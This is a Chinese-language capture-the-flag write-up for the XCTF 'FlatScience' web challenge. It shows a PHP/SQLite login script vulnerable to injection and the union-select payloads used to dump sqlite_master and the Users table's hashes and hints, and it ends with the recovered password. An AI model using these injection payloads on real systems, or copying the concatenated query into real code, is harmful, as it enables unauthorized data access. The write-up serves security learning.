xctf-FlatScience

xctf-FlatScience

1.题目：

2.过程：

这道题…………

打开上面写着：Best Papers，最好的论文，链接了好多paper，还是全英的……

查看robots.txt，找到login和admin页面，login页面源码发现注释：

我看不懂，但我……

在一通乱试下，原来是在login.php?debug……大概是个所谓的调试界面吧

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
        $user = $_POST['usr'];
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');
        
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }

    if(isset($row['id'])){
            setcookie('name',' '.$row['name'], time() + 60, '/');
            header("Location: /");
            die();
    }

}

if(isset($_GET['debug']))
highlight_file('login.php');
?> 

sqlite的注入：

使usr=admin’ or ‘1’=1发现页面跳转，cookie中有值为+admin的记录，本来想直接盲注，但发现sqlite似乎没有if function……学习一下sqlite的注入

dalao

sqlite_master隐藏表：

字段：type/name/tbl_name/rootpage/sql

type列记录了项目的类型，如table、index、view、trigger。

name列记录了项目的名称，如表名、索引名等。

tbl_name列记录所从属的表名，如索引所在的表名。对于表来说，该列就是表名本身。

rootpage列记录项目在数据库页中存储的编号。对于视图和触发器，该列值为0或者NULL。

sql列记录创建该项目的SQL语句。

**sqlite_version()**：版本号

用order by 判断表有两列，换掉admin并union select 1，2可以看到cookie值变为+2，

那就不用盲注了。sqlite没有concat但有group_concat……害

查表名：
usr=0' union select 1,(select tbl_name from sqlite_master where type='table')--
查列名：
usr=0' union select 1,(select sql from sqlite_master where type='table')--
查数据：
usr=0' union select 1,(select group_concat(hint) from Users)--

结果：

sql：
CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255))

id： 	  1,2,3

name： 	  admin,fritze,hansi

password： 3fab54a50e770d830c0416df817567662a9dc85c
	       ,
	       54eae8935c90f467427f05e4ece82cf569f89507
	       ,
	       34b0bb7c304949f9ff2fc101eef0f048be10d3bd

hint：	  my fav word in my fav paper?!,my love is…?,the password is password

还在打谜语……大概是paper里有一个词是密码吧……查一波，发现这还涉及到pdf转txt……

奈何太菜，脚本也看不懂，贴大佬链接吧：

dalao2

dalao3

密码是：ThinJerboa

wohaocai，6LCc6K+t5Lq65rua5Ye65ZOl6LCt5biC==